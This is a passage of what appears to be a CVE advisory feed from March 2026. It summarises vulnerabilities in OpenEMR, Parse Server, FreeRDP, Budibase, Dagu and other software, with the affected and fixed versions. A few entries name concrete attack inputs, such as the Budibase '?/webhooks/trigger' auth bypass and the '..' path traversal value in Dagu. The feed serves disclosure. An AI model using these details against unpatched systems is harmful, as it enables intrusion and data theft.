OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, an inverted boolean condition in ControllerRouter::route() causes the admin/super ACL check to be enforced only for controllers that already have their own internal authorization (review, log), while leaving all other CDR controllers — alerts, ajax, edit, add, detail, browse — accessible to any authenticated user. This allows any logged-in user to suppress clinical decision support alerts system-wide, delete or modify clinical plans, and edit rule configurations — all operations intended to require administrator privileges. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32126

]]> https://www.tenable.com/cve/CVE-2026-32125 https://www.tenable.com/cve/CVE-2026-32125 Wed, 11 Mar 2026 21:16:18 GMT Medium Severity

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, track/item names from the Track Anything feature are stored from user input (POST) and later rendered in Dygraph charts (titles/labels) using innerHTML or equivalent without escaping. A user who can create or edit Track Anything items can inject script that runs when any user views the corresponding graph. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32125

]]> https://www.tenable.com/cve/CVE-2026-32124 https://www.tenable.com/cve/CVE-2026-32124 Wed, 11 Mar 2026 21:16:18 GMT Medium Severity

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, the dynamic code picker AJAX endpoint returns code descriptions (code_text) that are rendered in the front end (e.g. DataTables) without HTML escaping. If an administrator (or user with code management rights) creates or edits a code with a malicious description containing script, that script runs in the browser of every user who uses the picker. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32124

]]> https://www.tenable.com/cve/CVE-2026-32123 https://www.tenable.com/cve/CVE-2026-32123 Wed, 11 Mar 2026 21:16:18 GMT Medium Severity

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, sensitivity checks for group encounters are broken because the code only consults form_encounter for sensitivity, while group encounters store sensitivity in form_groups_encounter. As a result, sensitivity is never correctly applied to group encounters, and users who should be restricted from viewing sensitive (e.g. mental health) encounters can view them. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32123

]]> https://www.tenable.com/cve/CVE-2026-32122 https://www.tenable.com/cve/CVE-2026-32122 Wed, 11 Mar 2026 21:16:17 GMT Medium Severity

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, the Claim File Tracker feature exposes an AJAX endpoint that returns billing claim metadata (claim IDs, payer info, transmission logs). The endpoint does not enforce the same ACL as the main billing/claims workflow, so authenticated users without appropriate billing permissions can access this data. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32122

]]> https://www.tenable.com/cve/CVE-2026-32121 https://www.tenable.com/cve/CVE-2026-32121 Wed, 11 Mar 2026 21:16:17 GMT Medium Severity

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, Stored XSS in prescription CSS/HTML print view via patient demographics. That finding involves server-side rendering of patient names via raw PHP echo. This finding involves client-side DOM-based rendering via jQuery .html() in a completely different component (portal/sign/assets/signer_api.js). The two share the same root cause (unsanitized patient names in patient_data), but they have different sinks, different affected components, different trigger actions, and require independent fixes. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32121

]]> https://www.tenable.com/cve/CVE-2026-32118 https://www.tenable.com/cve/CVE-2026-32118 Wed, 11 Mar 2026 21:16:17 GMT Critical Severity

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, stored cross-site scripting (XSS) in the Graphical Pain Map ("clickmap") form allows any authenticated clinician to inject arbitrary JavaScript that executes in the browser of every subsequent user who views the affected encounter form. Because session cookies are not marked HttpOnly, this enables full session hijacking of other users, including administrators. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32118

]]> https://www.tenable.com/cve/CVE-2026-32110 https://www.tenable.com/cve/CVE-2026-32110 Wed, 11 Mar 2026 21:16:17 GMT High Severity

Description

SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.

Read more at https://www.tenable.com/cve/CVE-2026-32110

]]> https://www.tenable.com/cve/CVE-2026-32109 https://www.tenable.com/cve/CVE-2026-32109 Wed, 11 Mar 2026 21:16:16 GMT Medium Severity

Description

Copyparty is a portable file server. Prior to 1.20.12, if an attacker has been given both read- and write-permissions to the server, they can upload a malicious file with the filename .prologue.html and then craft a link to potentially execute arbitrary JavaScript in the victim's context. Note that it is intended behavior that the JavaScript would execute if the target clicks a link to the HTML file itself; "https://example.com/foo/.prologue.html". The vulnerability is that "https://example.com/foo/?b" would also evaluate the file, making the behavior unexpected. There are existing preventative measures (strict SameSite cookies) which makes it harder to leverage this vulnerability in an attack; in order to gain control of the target's authenticated session, the link must be clicked from a page served by the server itself -- most likely by editing an existing resource, which would require additional access permissions. Finally, for this attack to be successful, the attacker's target must click the specific crafted link given by the attacker. This vulnerability is not activated by normally browsing the web-UI on the server. This vulnerability is fixed in 1.20.12.

Read more at https://www.tenable.com/cve/CVE-2026-32109

]]> https://www.tenable.com/cve/CVE-2026-32108 https://www.tenable.com/cve/CVE-2026-32108 Wed, 11 Mar 2026 21:16:16 GMT Low Severity

Description

Copyparty is a portable file server. Prior to 1.20.12, there was a missing permission-check in the shares feature (the shr global-option). This vulnerability only applies when the shares feature is used for the specific purpose of creating a share of just a single file inside a folder or either the FTP or SFTP server is enabled, and also made publicly accessible. Given these conditions, when a user is browsing a share through either FTP or SFTP (not http or https), they can gain read-access to the remaining files inside the shared folder by guessing/bruteforcing the filenames. It was not possible to descend into subdirectories in this manner; only the sibling files were accessible. This vulnerability is similar to CVE-2025-58753 which was previously fixed for HTTP and HTTPS, but not for FTP. The FTPS server did not yet exist at that time. This vulnerability is fixed in 1.20.12.

Read more at https://www.tenable.com/cve/CVE-2026-32108

]]> https://www.tenable.com/cve/CVE-2026-32098 https://www.tenable.com/cve/CVE-2026-32098 Wed, 11 Mar 2026 20:16:18 GMT Medium Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.9 and 8.6.35, an attacker can exploit LiveQuery subscriptions to infer the values of protected fields without directly receiving them. By subscribing with a WHERE clause that references a protected field (including via dot-notation or $regex), the attacker can observe whether LiveQuery events are delivered for matching objects. This creates a boolean oracle that leaks protected field values. The attack affects any class that has both protectedFields configured in Class-Level Permissions and LiveQuery enabled. This vulnerability is fixed in 9.6.0-alpha.9 and 8.6.35.

Read more at https://www.tenable.com/cve/CVE-2026-32098

]]> https://www.tenable.com/cve/CVE-2026-31949 https://www.tenable.com/cve/CVE-2026-31949 Fri, 13 Mar 2026 19:54:39 GMT Medium Severity

Description

LibreChat is a ChatGPT clone with additional features. Prior to 0.8.3-rc1, a Denial of Service (DoS) vulnerability exists in the DELETE /api/convos endpoint that allows an authenticated attacker to crash the Node.js server process by sending malformed requests. The DELETE /api/convos route handler attempts to destructure req.body.arg without validating that it exists. The server crashes due to an unhandled TypeError that bypasses Express error handling middleware and triggers process.exit(1). This vulnerability is fixed in 0.8.3-rc1.

Read more at https://www.tenable.com/cve/CVE-2026-31949

]]> https://www.tenable.com/cve/CVE-2026-31944 https://www.tenable.com/cve/CVE-2026-31944 Fri, 13 Mar 2026 19:54:39 GMT High Severity

Description

LibreChat is a ChatGPT clone with additional features. From 0.8.2 to 0.8.2-rc3, The MCP (Model Context Protocol) OAuth callback endpoint accepts the redirect from the identity provider and stores OAuth tokens for the user who initiated the flow, without verifying that the browser hitting the redirect URL is logged in or that the logged-in user matches the initiator. An attacker can send the authorization URL to a victim; when the victim completes the flow, the victim’s OAuth tokens are stored on the attacker’s LibreChat account, enabling account takeover of the victim’s MCP-linked services (e.g. Atlassian, Outlook). This vulnerability is fixed in 0.8.3-rc1.

Read more at https://www.tenable.com/cve/CVE-2026-31944

]]> https://www.tenable.com/cve/CVE-2026-31922 https://www.tenable.com/cve/CVE-2026-31922 Fri, 13 Mar 2026 19:54:39 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ays Pro Fox LMS fox-lms allows Blind SQL Injection.This issue affects Fox LMS: from n/a through <= 1.0.6.3.

Read more at https://www.tenable.com/cve/CVE-2026-31922

]]> https://www.tenable.com/cve/CVE-2026-31919 https://www.tenable.com/cve/CVE-2026-31919 Fri, 13 Mar 2026 19:54:39 GMT Medium Severity

Description

Missing Authorization vulnerability in Josh Kohlbach Advanced Coupons for WooCommerce Coupons advanced-coupons-for-woocommerce-free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Coupons for WooCommerce Coupons: from n/a through <= 4.7.1.

Read more at https://www.tenable.com/cve/CVE-2026-31919

]]> https://www.tenable.com/cve/CVE-2026-31918 https://www.tenable.com/cve/CVE-2026-31918 Fri, 13 Mar 2026 19:54:39 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in immonex immonex Kickstart immonex-kickstart allows Stored XSS.This issue affects immonex Kickstart: from n/a through <= 1.13.0.

Read more at https://www.tenable.com/cve/CVE-2026-31918

]]> https://www.tenable.com/cve/CVE-2026-31917 https://www.tenable.com/cve/CVE-2026-31917 Fri, 13 Mar 2026 19:54:38 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP ERP erp allows SQL Injection.This issue affects WP ERP: from n/a through <= 1.16.10.

Read more at https://www.tenable.com/cve/CVE-2026-31917

]]> https://www.tenable.com/cve/CVE-2026-31916 https://www.tenable.com/cve/CVE-2026-31916 Fri, 13 Mar 2026 19:54:38 GMT Medium Severity

Description

Missing Authorization vulnerability in Iulia Cazan Latest Post Shortcode latest-post-shortcode allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Latest Post Shortcode: from n/a through <= 14.2.1.

Read more at https://www.tenable.com/cve/CVE-2026-31916

]]> https://www.tenable.com/cve/CVE-2026-31915 https://www.tenable.com/cve/CVE-2026-31915 Fri, 13 Mar 2026 19:54:38 GMT Medium Severity

Description

Missing Authorization vulnerability in UX-themes Flatsome flatsome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flatsome: from n/a through <= 3.19.6.

Read more at https://www.tenable.com/cve/CVE-2026-31915

]]> https://www.tenable.com/cve/CVE-2026-31901 https://www.tenable.com/cve/CVE-2026-31901 Wed, 11 Mar 2026 20:16:16 GMT Medium Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 8.6.34 and 9.6.0-alpha.8, the email verification endpoint (/verificationEmailRequest) returns distinct error responses depending on whether an email address belongs to an existing user, is already verified, or does not exist. An attacker can send requests with different email addresses and observe the error codes to determine which email addresses are registered in the application. This is a user enumeration vulnerability that affects any Parse Server deployment with email verification enabled (verifyUserEmails: true). This vulnerability is fixed in 8.6.34 and 9.6.0-alpha.8.

Read more at https://www.tenable.com/cve/CVE-2026-31901

]]> https://www.tenable.com/cve/CVE-2026-31899 https://www.tenable.com/cve/CVE-2026-31899 Fri, 13 Mar 2026 19:54:38 GMT High Severity

Description

CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to Kozea/CairoSVG has exponential denial of service via recursive element amplification in cairosvg/defs.py. This causes CPU exhaustion from a small input.

Read more at https://www.tenable.com/cve/CVE-2026-31899

]]> https://www.tenable.com/cve/CVE-2026-31897 https://www.tenable.com/cve/CVE-2026-31897 Fri, 13 Mar 2026 19:54:38 GMT Info Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, there is an out-of-bounds read in freerdp_bitmap_decompress_planar when SrcSize is 0. The function dereferences *srcp (which points to pSrcData) without first verifying that SrcSize >= 1. When SrcSize is 0 and pSrcData is non-NULL, this reads one byte past the end of the source buffer. This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-31897

]]> https://www.tenable.com/cve/CVE-2026-31896 https://www.tenable.com/cve/CVE-2026-31896 Wed, 11 Mar 2026 20:16:15 GMT Critical Severity

Description

WeGIA is a web manager for charitable institutions. Prior to version 3.6.6, a critical SQL injection vulnerability exists in the WeGIA application. The remover_produto_ocultar.php script uses extract($_REQUEST) to populate local variables and then directly concatenates these variables into a SQL query executed via PDO::query. This allows an authenticated (or auth-bypassed) attacker to execute arbitrary SQL commands. This can be used to exfiltrate sensitive data from the database or, as demonstrated in this PoC, cause a time-based delay (denial of service). This vulnerability is fixed in 3.6.6.

Read more at https://www.tenable.com/cve/CVE-2026-31896

]]> https://www.tenable.com/cve/CVE-2026-31895 https://www.tenable.com/cve/CVE-2026-31895 Wed, 11 Mar 2026 20:16:15 GMT High Severity

Description

WeGIA is a web manager for charitable institutions. Prior to version 3.6.6, WeGIA (Web gerenciador para instituições assistenciais) contains a SQL injection vulnerability in html/matPat/restaurar_produto.php. The id_produto parameter from $_GET is directly interpolated into SQL queries without parameterization or sanitization. This vulnerability is fixed in 3.6.6.

Read more at https://www.tenable.com/cve/CVE-2026-31895

]]> https://www.tenable.com/cve/CVE-2026-31894 https://www.tenable.com/cve/CVE-2026-31894 Wed, 11 Mar 2026 20:16:15 GMT Medium Severity

Description

WeGIA is a web manager for charitable institutions. In 3.6.5, The patched loadBackupDB() extracts tar.gz archives to a temporary directory using PHP's PharData class, then uses glob() and file_get_contents() to read SQL files from the extracted contents. Neither the extraction nor the file reading validates whether archive members are symbolic links. This vulnerability is fixed in 3.6.6.

Read more at https://www.tenable.com/cve/CVE-2026-31894

]]> https://www.tenable.com/cve/CVE-2026-31890 https://www.tenable.com/cve/CVE-2026-31890 Thu, 12 Mar 2026 18:16:24 GMT Medium Severity

Description

Inspektor Gadget is a set of tools and framework for data collection and system inspection on Kubernetes clusters and Linux hosts using eBPF. Prior to 0.50.1, in a situation where the ring-buffer of a gadget is – incidentally or maliciously – already full, the gadget will silently drop events. The include/gadget/buffer.h file contains definitions for the Buffer API that gadgets can use to, among the other things, transfer data from eBPF programs to userspace. For hosts running a modern enough Linux kernel (>= 5.8), this transfer mechanism is based on ring-buffers. The size of the ring-buffer for the gadgets is hard-coded to 256KB. When a gadget_reserve_buf fails because of insufficient space, the gadget silently cleans up without producing an alert. The lost count reported by the eBPF operator, when using ring-buffers – the modern choice – is hardcoded to zero. The vulnerability can be used by a malicious event source (e.g. a compromised container) to cause a Denial Of Service, forcing the system to drop events coming from other containers (or the same container). This vulnerability is fixed in 0.50.1.

Read more at https://www.tenable.com/cve/CVE-2026-31890

]]> https://www.tenable.com/cve/CVE-2026-31886 https://www.tenable.com/cve/CVE-2026-31886 Fri, 13 Mar 2026 19:54:37 GMT Critical Severity

Description

Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as ".." to redirect the computed directory outside the intended /tmp// path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to "..", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll("/tmp") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-31886

]]> https://www.tenable.com/cve/CVE-2026-31885 https://www.tenable.com/cve/CVE-2026-31885 Fri, 13 Mar 2026 19:54:37 GMT Medium Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, there is an out-of-bounds read in MS-ADPCM and IMA-ADPCM decoders due to unchecked predictor and step_index values from input data. This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-31885

]]> https://www.tenable.com/cve/CVE-2026-31884 https://www.tenable.com/cve/CVE-2026-31884 Fri, 13 Mar 2026 19:54:37 GMT Medium Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, division by zero in MS-ADPCM and IMA-ADPCM decoders when nBlockAlign is 0, leading to a crash. In libfreerdp/codec/dsp.c, both ADPCM decoders use size % block_size where block_size = context->common.format.nBlockAlign. The nBlockAlign value comes from the Server Audio Formats PDU on the RDPSND channel. The value 0 is not validated anywhere before reaching the decoder. When nBlockAlign = 0, the modulo operation causes a SIGFPE (floating point exception) crash. This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-31884

]]> https://www.tenable.com/cve/CVE-2026-31883 https://www.tenable.com/cve/CVE-2026-31883 Fri, 13 Mar 2026 19:54:37 GMT Medium Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, a size_t underflow in the IMA-ADPCM and MS-ADPCM audio decoders leads to heap-buffer-overflow write via the RDPSND audio channel. In libfreerdp/codec/dsp.c, the IMA-ADPCM and MS-ADPCM decoders subtract block header sizes from a size_t variable without checking for underflow. When nBlockAlign (received from the server) is set such that size % block_size == 0 triggers the header parsing at a point where size is smaller than the header (4 or 8 bytes), the subtraction wraps size to ~SIZE_MAX. The while (size > 0) loop then continues for an astronomical number of iterations. This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-31883

]]> https://www.tenable.com/cve/CVE-2026-31882 https://www.tenable.com/cve/CVE-2026-31882 Fri, 13 Mar 2026 19:54:37 GMT High Severity

Description

Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, when Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status — bypassing the authentication that protects the REST API. The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value). The authentication middleware at internal/service/frontend/auth/middleware.go allows unauthenticated requests when AuthRequired is false. This vulnerability is fixed in 2.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-31882

]]> https://www.tenable.com/cve/CVE-2026-31879 https://www.tenable.com/cve/CVE-2026-31879 Wed, 11 Mar 2026 19:16:04 GMT Medium Severity

Description

Frappe is a full-stack web application framework. Prior to 14.100.2, 15.101.0, and 16.10.0, due to a lack of validation and improper permission checks, users could modify other user's private workspaces. Specially crafted requests could lead to stored XSS here. This vulnerability is fixed in 14.100.2, 15.101.0, and 16.10.0.

Read more at https://www.tenable.com/cve/CVE-2026-31879

]]> https://www.tenable.com/cve/CVE-2026-31878 https://www.tenable.com/cve/CVE-2026-31878 Wed, 11 Mar 2026 19:16:04 GMT Medium Severity

Description

Frappe is a full-stack web application framework. Prior to 14.100.1, 15.100.0, and 16.6.0, a malicious user could send a crafted request to an endpoint which would lead to the server making an HTTP call to a service of the user's choice. This vulnerability is fixed in 14.100.1, 15.100.0, and 16.6.0.

Read more at https://www.tenable.com/cve/CVE-2026-31878

]]> https://www.tenable.com/cve/CVE-2026-31877 https://www.tenable.com/cve/CVE-2026-31877 Wed, 11 Mar 2026 19:16:04 GMT Critical Severity

Description

Frappe is a full-stack web application framework. Prior to 15.84.0 and 14.99.0, a specially crafted request made to a certain endpoint could result in SQL injection, allowing an attacker to extract information they wouldn't otherwise be able to. This vulnerability is fixed in 15.84.0 and 14.99.0.

Read more at https://www.tenable.com/cve/CVE-2026-31877

]]> https://www.tenable.com/cve/CVE-2026-31875 https://www.tenable.com/cve/CVE-2026-31875 Wed, 11 Mar 2026 18:16:27 GMT High Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.7 and 8.6.33, when multi-factor authentication (MFA) via TOTP is enabled for a user account, Parse Server generates two single-use recovery codes. These codes are intended as a fallback when the user cannot provide a TOTP token. However, recovery codes are not consumed after use, allowing the same recovery code to be used an unlimited number of times. This defeats the single-use design of recovery codes and weakens the security of MFA-protected accounts. An attacker who obtains a single recovery code can repeatedly authenticate as the affected user without the code ever being invalidated. This vulnerability is fixed in 9.6.0-alpha.7 and 8.6.33.

Read more at https://www.tenable.com/cve/CVE-2026-31875

]]> https://www.tenable.com/cve/CVE-2026-31872 https://www.tenable.com/cve/CVE-2026-31872 Wed, 11 Mar 2026 18:16:26 GMT High Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.6 and 8.6.32, the protectedFields class-level permission (CLP) can be bypassed using dot-notation in query WHERE clauses and sort parameters. An attacker can use dot-notation to query or sort by sub-fields of a protected field, enabling a binary oracle attack to enumerate protected field values. This affects both MongoDB and PostgreSQL deployments. This vulnerability is fixed in 9.6.0-alpha.6 and 8.6.32.

Read more at https://www.tenable.com/cve/CVE-2026-31872

]]> https://www.tenable.com/cve/CVE-2026-31871 https://www.tenable.com/cve/CVE-2026-31871 Wed, 11 Mar 2026 18:16:26 GMT Critical Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.5 and 8.6.31, a SQL injection vulnerability exists in the PostgreSQL storage adapter when processing Increment operations on nested object fields using dot notation (e.g., stats.counter). The sub-key name is interpolated directly into SQL string literals without escaping. An attacker who can send write requests to the Parse Server REST API can inject arbitrary SQL via a crafted sub-key name containing single quotes, potentially executing commands or reading data from the database, bypassing CLPs and ACLs. Only Postgres deployments are affected. This vulnerability is fixed in 9.6.0-alpha.5 and 8.6.31.

Read more at https://www.tenable.com/cve/CVE-2026-31871

]]> https://www.tenable.com/cve/CVE-2026-31868 https://www.tenable.com/cve/CVE-2026-31868 Wed, 11 Mar 2026 18:16:25 GMT Medium Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.4 and 8.6.30, an attacker can upload a file with a file extension or content type that is not blocked by the default configuration of the Parse Server fileUpload.fileExtensions option. The file can contain malicious code, for example JavaScript in an SVG or XHTML file. When the file is accessed via its URL, the browser renders the file and executes the malicious code in the context of the Parse Server domain. This is a stored Cross-Site Scripting (XSS) vulnerability that can be exploited to steal session tokens, redirect users, or perform actions on behalf of other users. Affected file extensions and content types include .svgz, .xht, .xml, .xsl, .xslt, and content types application/xhtml+xml and application/xslt+xml for extensionless uploads. Uploading of .html, .htm, .shtml, .xhtml, and .svg files was already blocked. This vulnerability is fixed in 9.6.0-alpha.4 and 8.6.30.

Read more at https://www.tenable.com/cve/CVE-2026-31868

]]> https://www.tenable.com/cve/CVE-2026-31864 https://www.tenable.com/cve/CVE-2026-31864 Fri, 13 Mar 2026 19:54:36 GMT Medium Severity

Description

JumpServer is an open source bastion host and an operation and maintenance security audit system. a Server-Side Template Injection (SSTI) vulnerability exists in JumpServer's Applet and VirtualApp upload functionality. This vulnerability can only be exploited by users with administrative privileges (Application Applet Management or Virtual Application Management permissions). Attackers can exploit this vulnerability to execute arbitrary code within the JumpServer Core container. The vulnerability arises from unsafe use of Jinja2 template rendering when processing user-uploaded YAML configuration files. When a user uploads an Applet or VirtualApp ZIP package, the manifest.yml file is rendered through Jinja2 without sandbox restrictions, allowing template injection attacks.

Read more at https://www.tenable.com/cve/CVE-2026-31864

]]> https://www.tenable.com/cve/CVE-2026-31860 https://www.tenable.com/cve/CVE-2026-31860 Thu, 12 Mar 2026 18:16:24 GMT Medium Severity

Description

Unhead is a document head and template manager. Prior to 2.1.11, useHeadSafe() can be bypassed to inject arbitrary HTML attributes, including event handlers, into SSR-rendered tags. This is the composable that Nuxt docs recommend for safely handling user-generated content. The acceptDataAttrs function (safe.ts, line 16-20) allows any property key starting with data- through to the final HTML. It only checks the prefix, not whether the key contains spaces or other characters that break HTML attribute parsing. This vulnerability is fixed in 2.1.11.

Read more at https://www.tenable.com/cve/CVE-2026-31860

]]> https://www.tenable.com/cve/CVE-2026-31856 https://www.tenable.com/cve/CVE-2026-31856 Wed, 11 Mar 2026 18:16:24 GMT Critical Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. A SQL injection vulnerability exists in the PostgreSQL storage adapter when processing Increment operations on nested object fields using dot notation (e.g., stats.counter). The amount value is interpolated directly into the SQL query without parameterization or type validation. An attacker who can send write requests to the Parse Server REST API can inject arbitrary SQL subqueries to read any data from the database, bypassing CLPs and ACLs. MongoDB deployments are not affected. This vulnerability is fixed in 9.6.0-alpha.3 and 8.6.29.

Read more at https://www.tenable.com/cve/CVE-2026-31856

]]> https://www.tenable.com/cve/CVE-2026-31840 https://www.tenable.com/cve/CVE-2026-31840 Wed, 11 Mar 2026 17:16:58 GMT Critical Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.2 and 8.6.28, an attacker can use a dot-notation field name in combination with the sort query parameter to inject SQL into the PostgreSQL database through an improper escaping of sub-field values in dot-notation queries. The vulnerability may also affect queries that use dot-notation field names with the distinct and where query parameters. This vulnerability only affects deployments using a PostgreSQL database. This vulnerability is fixed in 9.6.0-alpha.2 and 8.6.28.

Read more at https://www.tenable.com/cve/CVE-2026-31840

]]> https://www.tenable.com/cve/CVE-2026-31816 https://www.tenable.com/cve/CVE-2026-31816 Mon, 09 Mar 2026 21:16:20 GMT Critical Severity

Description

Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.31.4 and earlier, the Budibase server's authorized() middleware that protects every server-side API endpoint can be completely bypassed by appending a webhook path pattern to the query string of any request. The isWebhookEndpoint() function uses an unanchored regex that tests against ctx.request.url, which in Koa includes the full URL with query parameters. When the regex matches, the authorized() middleware immediately calls return next(), skipping all authentication, authorization, role checks, and CSRF protection. This means a completely unauthenticated, remote attacker can access any server-side API endpoint by simply appending ?/webhooks/trigger (or any webhook pattern variant) to the URL.

Read more at https://www.tenable.com/cve/CVE-2026-31816

]]> https://www.tenable.com/cve/CVE-2026-31814 https://www.tenable.com/cve/CVE-2026-31814 Fri, 13 Mar 2026 19:54:36 GMT High Severity

Description

Yamux is a stream multiplexer over reliable, ordered connections such as TCP/IP. From 0.13.0 to before 0.13.9, a specially crafted WindowUpdate can cause arithmetic overflow in send-window accounting, which triggers a panic in the connection state machine. This is remotely reachable over a normal network connection and does not require authentication. This vulnerability is fixed in 0.13.9.

Read more at https://www.tenable.com/cve/CVE-2026-31814

]]> https://www.tenable.com/cve/CVE-2026-31806 https://www.tenable.com/cve/CVE-2026-31806 Fri, 13 Mar 2026 19:54:36 GMT Critical Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, the gdi_surface_bits() function processes SURFACE_BITS_COMMAND messages sent by the RDP server. When the command is handled using NSCodec, the bmp.width and bmp.height values provided by the server are not properly validated against the actual desktop dimensions. A malicious RDP server can supply crafted bmp.width and bmp.height values that exceed the expected surface size. Because these values are used during bitmap decoding and memory operations without proper bounds checking, this can lead to a heap buffer overflow. Since the attacker can also control the associated pixel data transmitted by the server, the overflow may be exploitable to overwrite adjacent heap memory. This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-31806

]]> https://www.tenable.com/cve/CVE-2026-31798 https://www.tenable.com/cve/CVE-2026-31798 Fri, 13 Mar 2026 19:54:36 GMT Medium Severity

Description

JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to v4.10.16-lts, JumpServer improperly validates certificates in the Custom SMS API Client. When JumpServer sends MFA/OTP codes via Custom SMS API, an attacker can intercept the request and capture the verification code BEFORE it reaches the user's phone. This vulnerability is fixed in v4.10.16-lts.

Read more at https://www.tenable.com/cve/CVE-2026-31798

]]> https://www.tenable.com/cve/CVE-2026-31797 https://www.tenable.com/cve/CVE-2026-31797 Tue, 10 Mar 2026 18:19:00 GMT Medium Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CTiffImg::ReadLine() when iccApplyProfiles processes a crafted TIFF image, causing memory disclosure or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-31797

]]> https://www.tenable.com/cve/CVE-2026-31796 https://www.tenable.com/cve/CVE-2026-31796 Tue, 10 Mar 2026 18:19:00 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow in icCurvesFromXml() causing heap memory corruption or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-31796

]]> https://www.tenable.com/cve/CVE-2026-31795 https://www.tenable.com/cve/CVE-2026-31795 Tue, 10 Mar 2026 18:18:59 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow write in CIccXform3DLut::Apply() corrupting stack memory or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-31795

]]> https://www.tenable.com/cve/CVE-2026-31794 https://www.tenable.com/cve/CVE-2026-31794 Tue, 10 Mar 2026 18:18:59 GMT Medium Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a segmentation fault from invalid/wild pointer read in CIccCLUT::Interp3d() causing a denial of service. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-31794

]]> https://www.tenable.com/cve/CVE-2026-31793 https://www.tenable.com/cve/CVE-2026-31793 Tue, 10 Mar 2026 18:18:59 GMT Medium Severity

Description

